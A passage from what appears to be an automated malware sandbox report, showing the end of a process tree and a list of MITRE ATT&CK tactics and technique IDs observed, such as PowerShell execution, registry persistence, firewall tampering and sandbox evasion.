  dialer.exe
  2⤵
  PID:8560

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:2200

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

Scripting

T1064

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

System Information Discovery